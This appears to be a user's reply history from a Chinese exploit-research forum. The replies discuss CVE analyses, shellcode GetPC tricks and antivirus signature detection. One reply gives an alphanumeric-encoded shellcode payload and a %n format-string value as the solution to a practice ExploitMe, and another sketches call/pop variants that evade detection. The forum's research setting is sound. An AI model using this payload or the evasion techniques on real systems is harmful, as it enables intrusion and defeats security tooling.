|
[水平测试]ExploitMe,格式化字符串漏洞演练
上个我的答案. C:\1234aEaeMEUe\eYeCeCeIAIAIAIAIAIAIAIAIAIAIAIAIAIA4444jXAQADAZABARALAYAIAQAIAQAIAhAAAZ1AIAIAJ11AIAIABABABQI1AIQIAIQI111AIAJQYAZBABABABABkMAGB9u4JBp3Z250EzkOnbqZq3aHnrXMNNpZoLZerTL1nbQpzZ9lrWxk88EovLH6UWkSKRPuXqQsVbm8kOJBm0A>prt ASIXASIXJJJJJJJJJJJJJJJJJ7RYjAXP0A0AkAAQ2AB2BB0BBABXP8ABuJIQwsTmqTps0LK1PtLNkbP5LnMlKcXwxLKbUgLLKsL6NqhwsKMLKt75pGsKEFSYYQYG1Lms3Je5cYKfoMndPuhJRcDtHO1zkdMS3JzW0XkL1MQikOhKNNjtNRUxcnksoEtvcyM0fLKTLpKLK3oULdCkmnkWtNkgsxEPhROPsrKePPT9oZpgpA 运行osk.exe fmt1的值设为: fmt1 db 091h,0fdh,13h,0,'%',0,'2',0,'5',0,'4',0,'x',0,'%',0,'n',0,0,0 比楼上的应该要通用一些. 另外这个题其实是调ms12-054中的CVE-2012-1851,随手写来练手的. |
|
[水平测试第二弹]新鲜出炉,MS12-060 MSCOMCTL.OCX 远程代码执行漏洞
该漏洞应该是最新的一个可利用的office漏洞,ms公告已明确说明该漏洞已有少量攻击案例. |
|
[原创]一种反检测的Shellcode GetPC方法Flush GetPC
麻烦楼上把《基于动态模拟的多态Shellcode建模与网络层检测》发来学习下哩... |
|
[原创]一种反检测的Shellcode GetPC方法Flush GetPC
如果你要说只是检测的e8 00 00 xx xx这类的短call,那么我还完全可以结合sc特征搜索或是具体漏洞写个自已补丁出来的 e8 00 00 xx xx |
|
[原创]一种反检测的Shellcode GetPC方法Flush GetPC
思路不错,不过我认为call+pop一样可以避免出现指定特征码. 比如: 00000000 call 00000007 00000006 nop 00000007 inc eax 00000008 pop ecx 变化有n多种,总不可能发现有call后面有pop就报吧. |
|
[水平测试]ExploitMe,格式化字符串漏洞演练
希望看到一些巧妙的利用方式,对了程序代码不能有改动,程序只能改fmt1变量的值,长度不要超过512字节. |
|
[原创]Microsoft Windows XP Win32k.sys Local BSoD Vulnerability
这个是哪个MS编号或者CVE来的? |
|
[讨论]MPlayer字幕溢出漏洞
难道不知道MS06-001?LNK loadlibrary?一堆的看一眼就中的洞啊 |
|
[原创]Microsoft Windows xp Win32k.sys Local Kernel DoS Vulnerability
楼上的zzzevazzz看起好眼熟...不知道是不是N年前那个 |
|
[原创]CVE-2012-0158 MSCOMCTL控件漏洞分析
这个洞EXP写得好可以正常打开且同时打WORD 03/07/写字板.呵呵. |
|
[讨论]CVE-2012-0769
看过这个洞作者水平的确牛B,但貌似没吹的这么准确. 他的确可以读任意地址里的值.但是哪个任意地址里会存放NTDLL.DLL的基地址哩? 作者的方法在X86 32位环境的WIN7下是读的 7FFE0300这个地址.但实际上这个地址存放的只是NTDLL的一个导出函数的地址. 但后用这个地址减去一个固定的000470b0计算出的NTDLL的基地址. 其实这儿还是等于说用了硬编码的地址,至少在不同的OS补丁下用这个不变的值是不通用的. 所以嘛应该还有改进的地方. |
|
[原创]卡巴斯基病毒库检测通过漏洞利用的CVE信息
而那些特征码太容易变换了. |
|
[原创]卡巴斯基病毒库检测通过漏洞利用的CVE信息
这个不好提取的... 其实要是能拿到杀软的漏洞检测引擎的脚本就爽了 不过那可是核心机密 我想拿到了也没多大用,我看过norton的,研究了一下它对复合二进制格式漏洞的查杀, 基本上流层是解析完二进制基本的格式后,就是特征码比对.根本不是杀洞. |
|
[原创]对Cve2011-3402的利用分析
吓死我的小心肝儿了~~ |
|
[原创]新鲜出炉 - MS12-004
看了下你的POC,是不是怕人用专门写得不是那么通用哦. |
|
[原创]新鲜出炉 - MS12-004
这个洞挖得出来要么是某大牛手工给找出来的,要么是运行很好 ((E1 & 0Fh) * 2^7 + E2) / 2中的E1和E2刚好构造出来的可以让IE出错. 挖出来后要利用这个用运气好就说不通了,真是经验加功底. 真是牛在天上飞啊. |
|
[原创]Analysing the POC of CVE-2012-0003
总算看完了,分析得很清楚.这些老外也太牛B了,看了这个EXP真是让我脸红啊. |
|
|
操作理由
RANk
{{ user_info.golds == '' ? 0 : user_info.golds }}
雪币
{{ experience }}
课程经验
{{ score }}
学习收益
{{study_duration_fmt}}
学习时长
基本信息
荣誉称号:
{{ honorary_title }}
能力排名:
No.{{ rank_num }}
等 级:
LV{{ rank_lv-100 }}
活跃值:
在线值:
浏览人数:{{ visits }}
最近活跃:{{ last_active_time }}
注册时间:{{ user_info.create_date_jsonfmt }}
勋章
兑换勋章
证书
证书查询 >
能力值